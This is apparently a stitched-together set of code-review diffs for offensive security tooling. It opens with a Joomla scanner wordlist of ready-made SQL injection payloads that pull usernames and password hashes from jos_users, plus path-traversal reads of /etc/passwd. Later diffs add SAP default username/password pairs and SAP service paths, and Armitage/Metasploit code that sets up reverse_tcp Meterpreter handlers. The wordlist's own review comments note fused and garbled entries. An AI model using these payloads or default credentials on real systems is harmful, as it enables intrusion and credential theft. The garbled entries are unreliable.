index.php?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&jat3action=gzip&amp;type=css&v=1
index.php?option=com_aardvertiser&cat_name=Vehicles'+AND+'1'='1&task=view
index.php?option=com_aardvertiser&cat_name=conf&task=<=
index.php?option=com_aardvertiser&task=
index.php?option=com_abc&view=abc&letter=AS&sectionid='
index.php?option=com_advert&id=36'
index.php?option=com_alameda&controller=comments&task=edit&storeid=-1+union+all+select+concat_ws(0x3a,username,password)+from+jos_users--
index.php?option=com_alfurqan15x&action=viewayat&surano=
index.php?option=com_amblog&view=amblog&catid=-1 UNION SELECT @@version
index.php?option=com_annonces&view=edit&Itemid=1
index.php?option=com_articleman&task=new
index.php?option=com_bbs&bid=-1
index.php?option=com_beamospetition&startpage=3&pet=-
index.php?option=com_beamospetition&startpage=3&pet=-1+Union+select+user()+from+jos_users-
index.php?option=com_bearleague&task=team&tid=8&sid=1&Itemid=%27
index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_biblioteca&view=biblioteca&testo=-a%25' UNION SELECT 1,username,password,4,5,6,7,8,9 FROM jos_users%23
index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_bnf&task=listar&action=filter_add&seccion=pago&seccion_id=-1
index.php?option=com_camelcitydb2&id=-3+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11+from+jos_users--
index.php?option=com_chronoconnectivity&itemid=1
index.php?option=com_chronocontact&itemid=1
index.php?option=com_cinema&Itemid=S@BUN&func=detail&id=
index.php?option=com_clantools&squad=1+
index.php?option=com_clantools&task=clanwar&showgame=1+
index.php?option=com_commedia&format=raw&task=image&pid=4&id=964'
index.php?option=com_commedia&task=page&commpid=21
index.php?option=com_connect&view=connect&controller=
index.php?option=com_content&view=article&id=[A VALID ID]&Itemid=[A VALID ID]&sflaction=dir&sflDir=../../../
index.php?option=com_delicious&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_dioneformwizard&controller=[LFI]%00
index.php?option=com_discussions&view=thread&catid=[Correct CatID]&thread=-1
index.php?option=com_dshop&controller=fpage&task=flypage&idofitem=12
index.php?option=com_easyfaq&Itemid=1&task=view&gid=
index.php?option=com_easyfaq&catid=1&task=view&id=-2527+
index.php?option=com_easyfaq&task=view&contact_id=
index.php?option=com_elite_experts&task=showExpertProfileDetailed&getExpertsFromCountry=&language=ru&id=
index.php?option=com_equipment&task=components&id=45&sec_men_id=
index.php?option=com_equipment&view=details&id=
index.php?option=com_estateagent&Itemid=47&act=object&task=showEO&id=[sqli]
index.php?option=com_etree&view=displays&layout=category&id=[SQL]
index.php?option=com_etree&view=displays&layout=user&user_id=[SQL]
index.php?option=com_ezautos&Itemid=49&id=1&task=helpers&firstCode=1
index.php?option=com_fabrik&view=table&tableid=13+union+select+1----
index.php?option=com_filecabinet&task=download&cid[]=7
index.php?option=com_firmy&task=section_show_set&Id=-1
index.php?option=com_fss&view=test&prodid=777777.7'+union+all+select+77777777777777%2C77777777777777%2C77777777777777%2Cversion()%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777%2C77777777777777--+D4NB4R
index.php?option=com_golfcourseguide&view=golfcourses&cid=1&id=
index.php?option=com_graphics&controller=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0&data_search=
index.php?option=com_grid&gid=15_ok_0',%20'15_ok_0?data_search=&rpp=
index.php?option=com_huruhelpdesk&view=detail
index.php?option=com_huruhelpdesk&view=detail&cid[0]=
index.php?option=com_huruhelpdesk&view=detail&cid[0]=-1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=1
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id=1 and 1=2
index.php?option=com_icagenda&view=list&layout=event&Itemid=520&id[]=1
index.php?option=com_iproperty&view=agentproperties&id=
index.php?option=com_jacomment&view=
index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_jcommunity&controller=members&task=1'
index.php?option=com_jeajaxeventcalendar&view=alleventlist_more&event_id=-13
index.php?option=com_jefaqpro&view=category&layout=categorylist&catid=2
index.php?option=com_jefaqpro&view=category&layout=categorylist&task=lists&catid=2
index.php?option=com_jeguestbook&view=../../../../../../../../etc/passwd%00
index.php?option=com_jeguestbook&view=item_detail&d_itemid=-1 OR (SELECT(IF(0x41=0x41, BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_jfuploader&Itemid=
index.php?option=com_jgen&task=view&id=
index.php?option=com_jgrid&controller=../../../../../../../../etc/passwd%00
index.php?option=com_jimtawl&Itemid=12&task=
index.php?option=com_jmarket&controller=product&task=1'
index.php?option=com_jobprofile&Itemid=61&task=profilesview&id=1'
index.php?option=com_jomdirectory&task=search&type=111+
index.php?option=com_joomdle&view=detail&cat_id=1&course_id=
index.php?option=com_joomla_flash_uploader&Itemid=1
index.php?option=com_joomleague&func=showNextMatch&p=[sqli]
index.php?option=com_joomleague&view=resultsmatrix&p=4&Itemid=[sqli]
index.php?option=com_joomtouch&controller=
index.php?option=com_jphone&controller../../../../../../../../../../etc/passwd%00
index.php?option=com_jphone&controller../../../../../../../../../../proc/self/environ%00
index.php?option=com_jscalendar&view=jscalendar&task=details&ev_id=999 UNION SELECT 1,username,password,4,5,6,7,8 FROM jos_users
index.php?option=com_jstore&controller=product-display&task=1'
index.php?option=com_jsubscription&controller=subscription&task=1'
index.php?option=com_jtickets&controller=ticket&task=1'
index.php?option=com_konsultasi&act=detail&sid=
index.php?option=com_ksadvertiser&Itemid=36&task=add&catid=0&lang=en
index.php?option=com_kunena&func=userlist&search=
index.php?option=com_lead&task=display&archive=1&Itemid=65&leadstatus=1'
index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_markt&page=show_category&catid=7+union+select+0,1,password,3,4,5,username,7,8+from+jos_users--
index.php?option=com_matamko&controller=
index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm
index.php?option=com_neorecruit&task=offer_view&id=
index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users--
index.php?option=com_noticeboard&controller=
index.php?option=com_obsuggest&controller=
index.php?option=com_ongallery&task=ft&id=-1+order+by+1--
index.php?option=com_ongallery&task=ft&id=-1+union+select+1--
index.php?option=com_oziogallery&Itemid=
index.php?option=com_page&id=53
index.php?option=com_pbbooking&task=validate&id=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(999999999,NULL),NULL)))
index.php?option=com_pcchess&controller=../../../../../../../../../../../../../etc/passwd%00
index.php?option=com_peliculas&view=peliculas&id=null[Sql Injection]
index.php?option=com_phocagallery&view=categories&Itemid=
index.php?option=com_photomapgallery&view=imagehandler&folder=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_php&file=../../../../../../../../../../etc/passwd
index.php?option=com_php&file=../images/phplogo.jpg
index.php?option=com_php&file=../js/ie_pngfix.js
index.php?option=com_ponygallery&Itemid=[sqli]
index.php?option=com_products&catid=-1
index.php?option=com_products&id=-1
index.php?option=com_products&product_id=-1
index.php?option=com_products&task=category&catid=-1
index.php?option=com_properties&task=agentlisting&aid=
index.php?option=com_qcontacts&Itemid=1'
index.php?option=com_qcontacts?=catid=0&filter_order=[SQLi]&filter_order_Dir=&option=com_qcontacts
index.php?option=com_record&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_restaurantguide&view=country&id='&Itemid=69
index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
index.php?option=com_seyret&view=
index.php?option=com_simpleshop&Itemid=26&task=viewprod&id=-999.9 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,concat(username,0x3e,password,0x3e,usertype,0x3e,lastvisitdate)+from+jos_users--
index.php?option=com_smartsite&controller=
index.php?option=com_spa&view=spa_product&cid=
index.php?option=com_spidercalendar
index.php?option=com_spidercalendar&date=1'
index.php?option=com_spielothek&task=savebattle&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=ddbdelete&dbtable=vS&loeschen[0]=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_spielothek&view=battle&wtbattle=play&bid=-1 OR (SELECT(IF(0x41=0x41,BENCHMARK(9999999999,NULL),NULL)))
index.php?option=com_staticxt&staticfile=test.php&id=1923
index.php?option=com_szallasok&mode=8&id=25 (SQL)
index.php?option=com_tag&task=tag&tag=
index.php?option=com_timereturns&view=timereturns&id=7+union+all+select+concat_ws(0x3a,username,password),2,3,4,5,6+from+jos_users--
index.php?option=com_timetrack&view=timetrack&ct_id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,CONCAT(username,0x3A,password) FROM jos_users
index.php?option=com_ultimateportfolio&controller=
index.php?option=com_users&view=registration
index.php?option=com_virtuemart&page=account.index&keyword=[sqli]
index.php?option=com_worldrates&controller=../../../../../../../../../../etc/passwd%00
index.php?option=com_x-shop&action=artdetail&idd='
index.php?option=com_x-shop&action=artdetail&idd='[SQLi]
index.php?option=com_xcomp&controller=../../[LFI]%00
index.php?option=com_xvs&controller=../../[LFI]%00
index.php?option=com_yellowpages&cat=-1923+UNION+SELECT 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+jos_users--+Union+select+user()+from+jos_users--
index.php?option=com_yjcontactus&view=
index.php?option=com_youtube&id_cate=4
index.php?option=com_zina&view=zina&Itemid=9
index.php?option=com_zoomportfolio&view=portfolio&view=portfolio&id=
index.php?search=NoGe&option=com_esearch&searchId=
index.php?view=videos&type=member&user_id=-62+union+select+1,2,3,4,5,6,7,8,9,10,11,12,group_concat(username,0x3a,password),14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+jos_users--&option=com_jomtube
index2.php?option=com_joomradio&page=show_video&id=-13+union+select+1,group_concat(username,0x3a,password),3,4,5,6,7+from+jos_users--
js/index.php?option=com_socialads&view=showad&Itemid=94
libraries/joomla/utilities/compat/php50x.php
libraries/pcl/pcltar.php
libraries/phpmailer/phpmailer.php
libraries/phpxmlrpc/xmlrpcs.php
modules/mod_artuploader/upload.php");
modules/mod_as_category.php
modules/mod_calendar.php
modules/mod_ccnewsletter/helper/popup.php?id=[SQLi]
modules/mod_dionefileuploader/upload.php?module_dir=./&module_max=2097152&file_type=application/octet-stream");
modules/mod_jfancy/script.php");
modules/mod_ppc_simple_spotlight/elements/upload_file.php
modules/mod_ppc_simple_spotlight/img/
modules/mod_pxt/
modules/mod_quick_question.php
modules/mod_visitorsgooglemap/map_data.php?action=listpoints&lastMarkerID=0
patch/makedown.php?arquivo=../../../../etc/passwd
plugins/content/efup_files/helper.php");
plugins/editors/idoeditor/themes/advanced/php/image.php" method="post" enctype="multipart/form-data">
plugins/editors/tinymce/jscripts/tiny_mce/plugins/tinybrowser/
plugins/editors/xstandard/attachmentlibrary.php
print.php?task=person&id=36 and 1=1
templates/be2004-2/
templates/ja_purity/
wap/wapmain.php?option=onews&action=link&id=-154+union+select+1,2,3,concat(username,0x3a,password),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28+from+jos_users+limit+0,1--
web/index.php?option=com_rokmodule&tmpl=component&type=raw&module=1'
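Review bot: several entries in this wordlist carry copy/paste residue and will never match a real path: `index.php?option=com_myhome&task=4&nidimmindex.php?option=com_myhome&task=4&nidimm` is two entries run together, the lines ending in `");` (`modules/mod_artuploader/upload.php");`, `modules/mod_jfancy/script.php");`, `plugins/content/efup_files/helper.php");` and the `mod_dionefileuploader` line) and the trailing `" method="post" enctype="multipart/form-data">` on the `idoeditor` line are fragments of the HTML they were lifted from, and `null[Sql Injection]` / `(SQL)` are annotations rather than URL components. Split or drop these so the file is one clean entry per line.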

View File

@ -12,3 +12,7 @@ ADS_AGENT ch4ngeme
DEVELOPER ch4ngeme
J2EE_ADMIN ch4ngeme
SAPJSF ch4ngeme
SAPR3 SAP
CTB_ADMIN sap123
XMI_DEMO sap123

View File

@ -93,11 +93,11 @@
/rwb/version.html
/sap/admin
/sap/bc/bsp/esh_os_service/favicon.gif
/sap/bc/bsp/sap
/sap/bc/bsp/sap
/sap/bc/bsp/sap/alertinbox
/sap/bc/bsp/sap/bsp_dlc_frcmp
/sap/bc/bsp/sap/bsp_veri
/sap/bc/bsp/sap/bsp_verificatio
/sap/bc/bsp/sap/bsp_verificatio
/sap/bc/bsp/sap/bsp_wd_base
/sap/bc/bsp/sap/bspwd_basics
/sap/bc/bsp/sap/certmap
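Review bot: `/sap/bc/bsp/sap/bsp_veri` and the two identical `/sap/bc/bsp/sap/bsp_verificatio` lines look truncated rather than like complete ICF service names, and the repeated `/sap/bc/bsp/sap` pair indicates a whitespace-only change; please confirm the intended names and remove the duplicate so the list stays one path per line.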
@ -116,31 +116,46 @@
/sap/bc/bsp/sap/graph_bsp_test
/sap/bc/bsp/sap/graph_bsp_test/Mimes
/sap/bc/bsp/sap/gsbirp
/sap/bc/bsp/sap/htmlb_samples
/sap/bc/bsp/sap/hrrcf_wd_dovru
/sap/bc/bsp/sap/htmlb_samples
/sap/bc/bsp/sap/iccmp_bp_cnfirm
/sap/bc/bsp/sap/iccmp_hdr_cntnr
/sap/bc/bsp/sap/iccmp_hdr_cntnt
/sap/bc/bsp/sap/iccmp_header
/sap/bc/bsp/sap/iccmp_ssc_ll/
/sap/bc/bsp/sap/ic_frw_notify
/sap/bc/bsp/sap/it00
/sap/bc/bsp/sap/public/bc
/sap/bc/bsp/sap/it00
/sap/bc/bsp/sap/it00/default.htm
/sap/bc/bsp/sap/it00/http_client.htm
/sap/bc/bsp/sap/it00/http_client_xml.htm
/sap/bc/bsp/sap/public/bc
/sap/bc/bsp/sap/public/graphics
/sap/bc/bsp/sap/sam_demo
/sap/bc/bsp/sap/sam_notifying
/sap/bc/bsp/sap/sam_sess_queue
/sap/bc/bsp/sap/sbspext_htmlb
/sap/bc/bsp/sap/sbspext_xhtmlb
/sap/bc/bsp/sap/sbspext_htmlb
/sap/bc/bsp/sap/sbspext_xhtmlb
/sap/bc/bsp/sap/spi_admin
/sap/bc/bsp/sap/spi_monitor
/sap/bc/bsp/sap/sxms_alertrules
/sap/bc/bsp/sap/system
/sap/bc/bsp/sap/system
/sap/bc/bsp/sap/thtmlb_scripts
/sap/bc/bsp/sap/thtmlb_styles
/sap/bc/bsp/sap/uicmp_ltx
/sap/bc/bsp/sap/xmb_bsp_log
/sap/bc/contentserver
/sap/bc/echo
/sap/bc/erecruiting/applwzd
/sap/bc/erecruiting/confirmation_e
/sap/bc/erecruiting/confirmation_i
/sap/bc/erecruiting/dataoverview
/sap/bc/erecruiting/password
/sap/bc/erecruiting/posting_apply
/sap/bc/erecruiting/qa_email_e
/sap/bc/erecruiting/qa_email_i
/sap/bc/erecruiting/registration
/sap/bc/erecruiting/startpage
/sap/bc/erecruiting/verification
/sap/bc/error
/sap/bc/FormToRfc
/sap/bc/graphics/net
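Review bot: this hunk mixes a reordering of existing entries (`htmlb_samples`, `it00`, `public/bc`, `sbspext_htmlb`, `sbspext_xhtmlb` and `system` each appear twice) with the genuinely new erecruiting and `it00/*` paths, which hides what was actually added; a sort-only change followed by the additions would be easier to review. `/sap/bc/bsp/sap/iccmp_ssc_ll/` is also the only entry with a trailing slash; drop it for consistency with the rest of the file.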
@ -165,10 +180,36 @@
/sap/bc/webdynpro/sap/cnp_light_test
/sap/bc/webdynpro/sap/configure_application
/sap/bc/webdynpro/sap/configure_component
/sap/bc/webdynpro/sap/esh_admin_ui_component
/sap/bc/webdynpro/sap/esh_admin_ui_component
/sap/bc/webdynpro/sap/esh_adm_smoketest_ui
/sap/bc/webdynpro/sap/esh_eng_modelling
/sap/bc/webdynpro/sap/esh_search_results.ui
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_dovr_ui
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_ext
/sap/bc/webdynpro/sap/hrrcf_a_act_cnf_ind_int
/sap/bc/webdynpro/sap/hrrcf_a_appls
/sap/bc/webdynpro/sap/hrrcf_a_applwizard
/sap/bc/webdynpro/sap/hrrcf_a_candidate_registration
/sap/bc/webdynpro/sap/hrrcf_a_candidate_verification
/sap/bc/webdynpro/sap/hrrcf_a_dataoverview
/sap/bc/webdynpro/sap/hrrcf_a_draft_applications
/sap/bc/webdynpro/sap/hrrcf_a_new_verif_mail
/sap/bc/webdynpro/sap/hrrcf_a_posting_apply
/sap/bc/webdynpro/sap/hrrcf_a_psett_ext
/sap/bc/webdynpro/sap/hrrcf_a_psett_int
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_extern
/sap/bc/webdynpro/sap/hrrcf_a_pw_via_email_intern
/sap/bc/webdynpro/sap/hrrcf_a_qa_mss
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch
/sap/bc/webdynpro/sap/hrrcf_a_refcode_srch_int
/sap/bc/webdynpro/sap/hrrcf_a_req_assess
/sap/bc/webdynpro/sap/hrrcf_a_requi_monitor
/sap/bc/webdynpro/sap/hrrcf_a_substitution_admin
/sap/bc/webdynpro/sap/hrrcf_a_substitution_manager
/sap/bc/webdynpro/sap/hrrcf_a_tp_assess
/sap/bc/webdynpro/sap/hrrcf_a_unregemp_job_search
/sap/bc/webdynpro/sap/hrrcf_a_unreg_job_search
/sap/bc/webdynpro/sap/hrrcf_a_unverified_cand
/sap/bc/webdynpro/sap/sh_adm_smoketest_files
/sap/bc/webdynpro/sap/wd_analyze_config_appl
/sap/bc/webdynpro/sap/wd_analyze_config_comp
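Review bot: `/sap/bc/webdynpro/sap/sh_adm_smoketest_files` looks as if it is missing the leading `e` by analogy with `esh_adm_smoketest_ui` a few lines above; please confirm the name. The duplicated `esh_admin_ui_component` line again points to a whitespace-only edit that should be dropped from the diff.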
@ -196,11 +237,12 @@
/sapmc/sapmc.html
/sap/monitoring/
/sap/public/bc
/sap/public/bc
/sap/public/bc/icons
/sap/public/bc/icons_rtl
/sap/public/bc/its
/sap/public/bc/its/designs
/sap/public/bc/its/mimes
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
/sap/public/bc/its/mimes/system/SL/page/hourglass.html
/sap/public/bc/its/mobile/itsmobile00
/sap/public/bc/its/mobile/itsmobile01
/sap/public/bc/its/mobile/rfid
@ -211,8 +253,9 @@
/sap/public/bc/pictograms
/sap/public/bc/sicf_login_run
/sap/public/bc/trex
/sap/public/bc/ur
/sap/public/bc/ur
/sap/public/bc/wdtracetool
/sap/public/bc/webdynpro
/sap/public/bc/webdynpro/adobechallenge
/sap/public/bc/webdynpro/mimes
/sap/public/bc/webdynpro/ssr
@ -220,16 +263,17 @@
/sap/public/bc/webicons
/sap/public/bc/workflow
/sap/public/bc/workflow/shortcut
/sap/public/bsp/sap
/sap/public/bsp/sap/htmlb
/sap/public/bsp/sap/public
/sap/public/bsp/sap/public/bc
/sap/public/bsp
/sap/public/bsp/sap
/sap/public/bsp/sap/htmlb
/sap/public/bsp/sap/public
/sap/public/bsp/sap/public/bc
/sap/public/bsp/sap/public/faa
/sap/public/bsp/sap/public/graphics
/sap/public/bsp/sap/public/graphics/jnet_handler
/sap/public/bsp/sap/public/graphics/mimes
/sap/public/bsp/sap/system
/sap/public/bsp/sap/system_public
/sap/public/bsp/sap/system
/sap/public/bsp/sap/system_public
/sap/public/icf_check
/sap/public/icf_info
/sap/public/icf_info/icr_groups

View File

@ -16,6 +16,8 @@
depend="yes"
debug="true"
optimize="yes"
target="1.6"
source="1.6"
includeantruntime="fuckno"
>
<classpath path="./lib/jgraphx.jar;./lib/sleep.jar;./lib/msgpack-0.5.1-devel.jar;./lib/postgresql-9.1-901.jdbc4.jar" />
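Review bot: `includeantruntime="fuckno"` only works because Ant treats any value other than true/yes/on as false; write `includeantruntime="no"` so the intent is explicit and the build file is fit to ship.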

View File

@ -3,7 +3,7 @@
<center><h1>Armitage 1.45</h1></center>
<p>An attack management tool for Metasploit&reg;
<br />Release: 4 Jan 13</p>
<br />Release: 12 Feb 13</p>
<br />
<p>Developed by:</p>

View File

@ -4,6 +4,7 @@
^msf (.*?)\((.*?)\) > \umsf\u $1(\c4$2\o) >
^\[\*\] (.*) \cC[*]\o $1
^\[\+\] (.*) \c9[+]\o $1
^\[\!\] (.*) \c8[!]\o $1
^\[\-\] (.*) \c4[-]\o $1
^ =\[ (.*) =[\c7 $1
^(=[=\s]+) \cE$1

View File

@ -0,0 +1,12 @@
@echo off
set BASE=$$BASE$$..\..\
cd "%BASE%"
set PATH=%BASE%ruby\bin;%BASE%java\bin;%BASE%tools;%BASE%nmap;%BASE%postgresql\bin;%PATH%
IF NOT EXIST "%BASE%java" GOTO NO_JAVA
set JAVA_HOME="%BASE%java"
:NO_JAVA
set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml"
set MSF_BUNDLE_GEMS=0
set BUNDLE_GEMFILE=%BASE%apps\pro\ui\Gemfile
cd "%BASE%apps\pro\msf3"
rubyw msfrpcd -a 127.0.0.1 -U $$USER$$ -P $$PASS$$ -S -f -p $$PORT$$
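Review bot: `set JAVA_HOME="%BASE%java"` and `set MSF_DATABASE_CONFIG="%BASE%apps\pro\ui\config\database.yml"` put the quote characters into the variable value (cmd keeps everything after `=`), which breaks any later concatenation of those paths; use the `set "JAVA_HOME=%BASE%java"` form instead. `cd "%BASE%"` also needs `/d` to take effect when the install is on a different drive. Separately, `-P $$PASS$$` exposes the RPC password to any local process listing, and `-S` disables SSL on the RPC socket; that is tolerable only because `-a 127.0.0.1` keeps the listener loopback-only, so a comment in the script should record that dependency.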

View File

@ -42,8 +42,13 @@ sub c_client {
sub setupHandlers {
find_job("Exploit: multi/handler", {
if ($1 == -1) {
# set LPORT for the user...
local('$c');
$c = call($client, "console.allocate")['id'];
call($client, "console.write", $c, "setg LPORT " . randomPort() . "\n");
call($client, "console.release", $c);
# setup a handler for meterpreter
call($client, "core.setg", "LPORT", randomPort());
call($client, "module.execute", "exploit", "multi/handler", %(
PAYLOAD => "windows/meterpreter/reverse_tcp",
LHOST => "0.0.0.0",
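Review bot: the new console `setg LPORT` block and the existing `call($client, "core.setg", "LPORT", randomPort())` that follows it, if that line is meant to stay, each call `randomPort()` independently, so the global LPORT is set twice to two different values and the handler may not listen on the port the user ends up with. Keep a single call, store the port in a local and use it for both the `setg` and the handler. The console is also released without reading its output, so a failed `setg` goes unnoticed.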
@ -55,7 +60,7 @@ sub setupHandlers {
sub main {
global('$client $mclient');
local('%r $exception');
local('%r $exception $lhost $temp $c');
setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L);
@ -81,8 +86,24 @@ sub main {
# setup second thread.
%r = call($client, "armitage.validate", $user, $pass, $null, "armitage", 120326);
# resolve lhost..
$c = call($client, "console.allocate")['id'];
call($client, "console.write", $c, "setg LHOST\n");
while ($lhost eq "") {
$temp = call($client, "console.read", $c)['data'];
if (["$temp" startsWith: "LHOST => "]) {
$lhost = substr(["$temp" trim], 9);
}
else {
# this shouldn't happen because having LHOST set is a precondition
# for Cortana to connect to a team server.
sleep(1000);
}
}
call($client, "console.release", $c);
# pass some objects back yo.
[$loader passObjects: $client, $mclient];
[$loader passObjects: $client, $mclient, $lhost];
# don't make previous messages available...
call($mclient, "armitage.skip");
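Review bot: the LHOST resolution loop only terminates when a `console.read` chunk begins with `LHOST => `; if the console's initial banner or prompt arrives in the same chunk as the `setg LHOST` output, or LHOST is unset, this loops forever with a one-second sleep and blocks the connect. Search for the `LHOST => ` line inside `$temp` rather than requiring it at offset 0, and bound the retries so the failure surfaces as an error instead of a hang.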

View File

@ -9,7 +9,10 @@ import msf.*;
# setg("varname", "value")
sub setg {
call_async("core.setg", $1, $2);
if ($1 eq "LHOST") {
call_async("armitage.set_ip", $2);
}
cmd_safe("setg $1 $2");
}
sub readg {
@ -335,14 +338,22 @@ sub multi_handler {
}
sub handler {
local('%o $3');
local('%o $3 $key $value');
# default options
%o['PAYLOAD'] = $1;
%o['LPORT'] = $2;
%o['DisablePayloadHandler'] = 'false';
%o['ExitOnSession'] = 'false';
# let the user override anything
if ($3) {
%o = copy($3);
foreach $key => $value ($3) {
%o[$key] = $value;
}
}
%o['PAYLOAD'] = "payload/ $+ $1";
%o['LPORT'] = $2;
# make sure LHOST is correct
if ('LHOST' !in %o) {
if ("*http*" iswm $1) {
%o['LHOST'] = lhost();
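Review bot: the comment says `let the user override anything`, but the `%o['PAYLOAD']` and `%o['LPORT']` assignments now run after the `$3` merge, so a caller can no longer override those two keys; either move the merge below them or correct the comment. The `payload/ $+ $1` prefix is also applied unconditionally, so a caller that already passes a `payload/`-prefixed name gets `payload/payload/...`.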
@ -352,6 +363,7 @@ sub handler {
}
}
# let's do it...
return launch('exploit', 'multi/handler', %o);
}

View File

@ -15,7 +15,7 @@ import graph.*;
import java.awt.image.*;
global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS');
global('$frame $tabs $menubar $msfrpc_handle $REMOTE $cortana $MY_ADDRESS $DESCRIBE @CLOSEME');
sub describeHost {
local('$desc');
@ -59,7 +59,7 @@ sub showHost {
else if ("*XP*" iswm $match || "*2003*" iswm $match || "*.NET*" iswm $match) {
push(@overlay, 'resources/windowsxp.png');
}
else if ("*8*" iswm $match) {
else if ("*8*" iswm $match && "*2008*" !iswm $match) {
push(@overlay, 'resources/windows8.png');
}
else {
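Review bot: `"*8*" iswm $match && "*2008*" !iswm $match` still treats any OS string containing an `8` (a `98`, a service pack or build number) as Windows 8, and it avoids the XP/2003 cases only because that branch is tested first; use a more specific pattern for the Windows 8 flavor so the overlay is not chosen by accident.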
@ -139,7 +139,7 @@ sub _connectToMetasploit {
$progress = [new ProgressMonitor: $null, "Connecting to $1 $+ : $+ $2", "first try... wish me luck.", 0, 100];
# keep track of whether we're connected to a local or remote Metasploit instance. This will affect what we expose.
$REMOTE = iff($1 eq "127.0.0.1", $null, 1);
$REMOTE = iff($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost", $null, 1);
$flag = 10;
while ($flag) {
@ -160,11 +160,12 @@ sub _connectToMetasploit {
}
# connecting locally? go to Metasploit directly...
if ($1 eq "127.0.0.1" || $1 eq "::1" || $1 eq "localhost") {
if ($REMOTE is $null) {
$client = [new MsgRpcImpl: $3, $4, $1, long($2), $null, $debug];
$aclient = [new RpcAsync: $client];
$mclient = $client;
initConsolePool();
$DESCRIBE = "localhost";
}
# we have a team server... connect and authenticate to it.
else {
@ -172,6 +173,11 @@ sub _connectToMetasploit {
setField(^msf.MeterpreterSession, DEFAULT_WAIT => 20000L);
$mclient = setup_collaboration($3, $4, $1, $2);
$aclient = $mclient;
if ($mclient is $null) {
[$progress close];
return;
}
}
$flag = $null;
}
@ -239,10 +245,6 @@ sub _connectToMetasploit {
[$progress setNote: "Connected: ..."];
[$progress setProgress: 60];
if (!$REMOTE && %MSF_GLOBAL['ARMITAGE_TEAM'] eq '1') {
showErrorAndQuit("Do not connect to 127.0.0.1 when\nrunning a team server.");
}
dispatchEvent(&postSetup);
}, \$progress));
}
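Review bot: deleting the `Do not connect to 127.0.0.1 when running a team server` guard silently permits the configuration it used to reject; if that is now intended because `showErrorAndQuit` no longer exits the process, say so in the commit message, otherwise replace the removed block with a non-fatal warning rather than dropping the check entirely.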
@ -323,28 +325,23 @@ sub postSetup {
}
sub main {
local('$console $panel $dir');
local('$console $panel $dir $app');
$frame = [new ArmitageApplication];
$frame = [new ArmitageApplication: $__frame__, $DESCRIBE, $mclient];
[$frame setTitle: $TITLE];
[$frame setSize: 800, 600];
[$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
init_menus($frame);
initLogSystem();
[$frame setIconImage: [ImageIO read: resource("resources/armitage-icon.gif")]];
[$frame show];
[$frame setExtendedState: [JFrame MAXIMIZED_BOTH]];
# this window listener is dead-lock waiting to happen. That's why we're adding it in a
# separate thread (Sleep threads don't share data/locks).
fork({
[$frame addWindowListener: {
[$__frame__ addWindowListener: {
if ($0 eq "windowClosing" && $msfrpc_handle !is $null) {
closef($msfrpc_handle);
}
}];
}, \$msfrpc_handle, \$frame);
}, \$msfrpc_handle, \$__frame__);
dispatchEvent({
if ($client !is $mclient) {
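Review bot: the windowClosing listener only closes `$msfrpc_handle`, while the `Close` menu item added in this same commit also runs `closef` over `@CLOSEME`; closing the main window therefore leaves the team-server sockets pushed onto `@CLOSEME` open. Factor the teardown into one function and call it from both paths.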
@ -375,7 +372,6 @@ sub checkDir {
}
}
setLookAndFeel();
checkDir();
if ($CLIENT_CONFIG !is $null && -exists $CLIENT_CONFIG) {

View File

@ -679,12 +679,20 @@ sub addFileListener {
$actions["SigningCert"] = $actions["*FILE*"];
$actions["SigningKey"] = $actions["*FILE*"];
$actions["Wordlist"] = $actions["*FILE*"];
$actions["EXE::Custom"] = $actions["*FILE*"];
$actions["EXE::Template"] = $actions["*FILE*"];
$actions["WORDLIST"] = $actions["*FILE*"];
$actions["REXE"] = $actions["*FILE*"];
# set up an action to choose a session
$actions["SESSION"] = lambda(&chooseSession);
# helpers to set credential pairs from database... yay?
$actions["USERNAME"] = lambda(&credentialHelper, \$model, $USER => "USERNAME", $PASS => "PASSWORD");
